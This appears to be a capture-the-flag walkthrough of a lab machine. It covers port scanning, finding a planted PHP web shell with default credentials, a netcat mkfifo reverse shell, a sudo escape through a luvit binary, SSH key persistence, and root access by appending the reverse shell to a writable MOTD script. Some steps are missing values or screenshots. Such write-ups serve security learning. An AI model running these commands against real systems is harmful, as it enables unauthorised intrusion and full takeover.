

sudo nmap -p- -sS -sV           

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Jumping straight into port 80 we are presented with the page below:

Viewing the source for this web page shows the hacker has left a hint 'Some of the best web shells that you might need ;)'.

From here I executed with the CommonBackdoors-PHP.fuzz.txt wordlist from seclists which can be found here:

sudo python3 -u -w /usr/share/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt --full-url -t 75 finds smevk.php from the wordlist. Browsing to the PHP webshell shows the following below:

Looking up the credentials for the SmEvK web shell we get the following GitHub link:

This shows that the defaults are admin:admin

Once logged in we get the page below:

Heading over to the 'console' tab we see that when running which nc that netcat is installed. I set up a local listener on my attacking machine.

sudo nc -lvp 80

Then executed the following command on the web shell to gain a full reverse shell.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 80 >/tmp/f

Checking the users in /home/ we have sysadmin and webadmin. The user webadmin has a note.txt file in their desktop.

Following this I was unable to find the tool which was mentioned. I then checked sudo privileges with sudo -l and took note that we can run sudo as the user sysadmin without specifying a password on the path /home/sysadmin/luvit.

Running the following command allows us to start the binary but seems to throw an exception and kick us out immediately.

sudo -u sysadmin /home/sysadmin/luvit

Looking up LUA on GTFOBins shows we may be able to spawn a system shell with the privileges of the executing user.

Using this I run the following command replacing 'lua' with 'luvit'.

sudo -u sysadmin /home/sysadmin/luvit -e 'os.execute("/bin/sh")'

Which in turn gives us a shell as the user 'sysadmin'. Next use the following command to upgrade the shell.

/usr/bin/script -qc /bin/bash /dev/null

From here I opted to gain SSH access. As we do not know the password of the sysadmin user I will instead drop my attacking machines contents into /home/sysadmin/.ssh/authorized_keys file.

If you do not have a file on the attacking machine run the following command and hit enter on all options.

ssh-keygen -t rsa

Then cat the contents of

Then echo in the authorized_keys file on the target machine.

We can then log into SSH as the user sysadmin.

We also see the hacker has altered the MOTD banner when logging in. We can check the permissions of this in /etc/updatemotd.d/.

As we have write permissions over these files I will simply inject a netcat reverse shell into the first script run which is 00-header.

Set a netcat listener on the attacking machine then run the following command on the target machine:

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 80 >/tmp/f' >> 00-header

Once completed log out of SSH and back in to execute. The login should hang and fail to complete.

Resulting in a root shell on the netcat listener.

Last updated